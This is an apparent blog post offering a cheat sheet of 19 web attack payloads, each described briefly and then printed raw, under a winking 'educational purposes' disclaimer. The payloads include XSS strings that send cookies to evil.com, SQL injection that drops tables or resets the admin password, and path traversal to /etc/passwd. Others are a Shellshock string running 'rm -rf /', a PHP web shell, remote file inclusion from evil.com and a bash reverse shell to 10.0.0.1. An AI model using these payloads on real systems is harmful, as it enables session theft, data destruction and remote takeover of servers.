Jun 17, 2023, 09:55 AM
Hello! Today, we'll dive into 19 different web exploit payload examples and their respective use cases. These examples are for educational (wink wink) purposes only. Happy hacking! ?️♀️?
I won't hide this content as learning should be free.
[Payload 1]
Cross-Site Scripting (XSS) payload. Tests server software that doesn't sanitize user input. Use on endpoints that accept and display user-generated content.
[Payload 2]
SQL Injection payload. Tests websites running server software like MySQL, MSSQL, Oracle, etc. Target endpoints that interact with a database.
[Payload 3]
Path Traversal payload. Used against server software that fails to sanitize file paths. Target endpoints typically interact with the file system.
[Payload 4]
DOM-based XSS attack payload. Tests endpoints that insert user-supplied input into the Document Object Model without proper sanitization.
[Payload 5]
Shellshock (Bashdoor) attack payload. Servers running CGI scripts that invoke Bash are typically vulnerable. Target endpoints invoking a vulnerable Bash version.
[Payload 6]
Remote File Inclusion (RFI) payload. Tests PHP software with allow_url_fopen or allow_url_include enabled. Target endpoints typically include a file or script from another source.
[Payload 7]
XSS payload attempts to steal cookies. Tests server software that fails to sanitize user input and doesn't use HTTP-Only cookies.
[Payload 8]
Time-based SQL Injection payload. Tests servers running SQL databases where traditional error-based SQLi isn't possible. Target endpoints that interact with a database.
[Payload 9]
Null Byte Injection payload. Tests older PHP and ASP servers that truncate input at null byte characters.
[Payload 10]
SQL Injection "Bobby Tables" payload. Tests server software that uses an SQL database and doesn't sanitize input.
[Payload 11]
Another XSS attack vector. Can be used to test any server software that doesn't properly sanitize user input for iframe elements.
[Payload 12]
This XSS payload steals cookies by sending them to an external site via an image request. Tests server software that doesn't properly sanitize user input and doesn't use HTTP-Only cookies.
[Payload 13]
Command injection payload. Useful for testing endpoints that execute system commands based on user input.
[Payload 14]
This payload attempts an FTP wrapper attack. It tests PHP server software configured to allow URL wrappers in file functions.
[Payload 15]
This payload uses a PHP filter for Local File Inclusion (LFI) and Remote File Inclusion (RFI) attacks. Tests PHP server software configured to allow URL wrappers.
[Payload 16]
This payload is for command injection. Tests server software that executes shell commands based on user input.
[Payload 17]
This SQL injection payload attempts to modify data in a database. Tests server software that doesn't properly sanitize user input in SQL queries.
[Payload 18]
This XSS payload attempts to load a malicious script from an external source. Tests server software that doesn't properly sanitise user input for script elements.
[Payload 19]
Another XSS payload, this one using the marquee HTML element for visual confirmation of the exploit. Tests server software that doesn't properly sanitise user input.
I won't hide this content as learning should be free.
[Payload 1]
'"><img src='x'onerror='alert(1)'>[Payload 2]
'%20or%20'1'='1[Payload 3]
../../../etc/passwd[Payload 4]
<details open="" ontoggle="javascript:alert(1)">[Payload 5]
() { :; }; /bin/bash -c 'rm -rf /'[Payload 6]
http://evil.com/shell.php[Payload 7]
<script>window.location='http://evil.com/steal.php?cookie='+document.cookie</script>[Payload 8]
sleep(20)[Payload 9]
foo%00[Payload 10]
'; DROP TABLE users; --[Payload 11]
<iframe src="http://evil.com/xss.html">[Payload 12]
<script>new Image().src="http://evil.com/steal.php?"+document.cookie;</script>[Payload 13]
<?php echo shell_exec($_GET['cmd']); ?>[Payload 14]
/test.php?file=ftp://user:pass@evil.com/shell.php[Payload 15]
php://filter/convert.base64-encode/resource=index.php[Payload 16]
'; exec '/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'[Payload 17]
1; UPDATE users SET password = md5('new_password') WHERE name = 'admin';[Payload 18]
<script src="http://evil.com/xss.js"></script>[Payload 19]
"><marquee><h1>XSS</h1></marquee>
